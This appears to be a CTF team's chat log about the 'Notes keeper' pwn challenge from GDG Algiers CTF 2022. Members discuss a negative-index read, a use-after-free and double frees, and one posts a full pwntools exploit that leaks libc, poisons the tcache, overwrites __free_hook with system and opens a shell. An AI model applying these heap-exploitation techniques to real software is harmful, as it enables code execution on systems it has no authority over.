Project Sekai
🔒 GDG Algiers CTF 2022 / ✅-pwn-notes-keeper
Notes keeper - 500 points
Category: Pwn
Description:
> A friend of mine told me that he uses a strong notes keeper to write his diaries there. Can you prove him wrong and pwn it?
Author: Scorpion197
Files:
Tags: No tags.
Sutx pinned a message to this channel. 10/07/2022 11:00 AM
@god lives in my skin wants to collaborate 🤝
god lives in my skin 10/07/2022 2:54 PM
if anyone decides to work on this at a later point, the view note function allows us to read from a negative index
14:55
you can leak libc via the io stderr pointer at offset -2, and leak binary base via global_dtors_aux at offset -92
14:57
unlimited frees at any arbitrary index in the remove_note function and a uaf read in the view_note function
@Johnathan Huu Tri wants to collaborate 🤝
Johnathan Huu Tri 10/07/2022 6:17 PM
also we have UAF
👍 1
got this msg from lemon: we have a UAF but we don't have an edit() function, so somehow we need to overlap the chunk. I tried to alloc 3 chunks of the same size, free 0, alloc. I got 2 pointers but I still don't know how to write
Johnathan Huu Tri 10/07/2022 7:57 PM
ok I solved it
19:57
gg
Johnathan Huu Tri 10/07/2022 7:57 PM
cannot overlap chunk
19:57
I use another trick
19:58
to overlap chunks, we need a chunk that can go to the unsorted bin
19:58
I will submit when I've finished my script
19:58
so leave this chall to me
god lives in my skin 10/07/2022 7:58 PM
alr pls send script when finished, I'm lost lmao
Johnathan Huu Tri 10/07/2022 7:59 PM
sure
👍 1
Johnathan Huu Tri
used /ctf
✅ Well done, challenge solved!
Johnathan Huu Tri 10/07/2022 8:47 PM
```python
#!/usr/bin/env python3
from pwn import *

exe = ELF("./chall_patched", checksec=False)
libc = ELF("./libc.so.6", checksec=False)
ld = ELF("./ld-2.29.so", checksec=False)
context.binary = exe


def conn():
    if args.LOCAL:
        r = process([exe.path])
        if args.DEBUG:
            gdb.attach(r)
    else:
        r = remote("pwn.chal.ctf.gdgalgiers.com", 1405)
    return r


sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)


# Menu wrappers for the four options of the notes keeper binary.
def add(size, content):
    sla(b'option: ', b'1')
    sla(b'Size: ', str(size).encode())
    sla(b'content: ', content)


def remove(idx):
    sla(b'option: ', b'2')
    sla(b'index: ', str(idx).encode())


def edit():
    sla(b'option: ', b'3')


def view(idx):
    sla(b'option: ', b'4')
    sla(b'Index: ', str(idx).encode())


p = conn()

##################################
### Stage 1: Leak libc address ###
##################################
# view_note does not bounds-check the index: index -2 points at the
# stderr IO pointer, which gives us a libc address.
view(-2)
p.recvuntil(b'located at: ')
libc_leak = int(p.recv(14), 16)
libc.address = libc_leak - 0x1e5680
log.info(hex(libc.address))

##############################
### Stage 2: Tcache attack ###
##############################
# Because when we free a chunk within tcache size
# the program just checks if the size is valid, doesn't check if
# Idea: free the same chunk with different sizes
add(0x18, b'0'*0x8)
add(0x18, b'1'*0x8)
add(0x118, b'2'*0x8)
remove(2)
remove(1)
# GDB()
add(0x18, b'0'*0x18)
remove(0)
remove(2)
add(0x118, p64(libc.sym['__free_hook']))
add(0x18, b'/bin/sh')
add(0x18, p64(libc.sym['system']))
remove(1)

p.interactive()
```
god lives in my skin 10/07/2022 8:52 PM
sick thanks, I was way overcomplicating things
hehe 1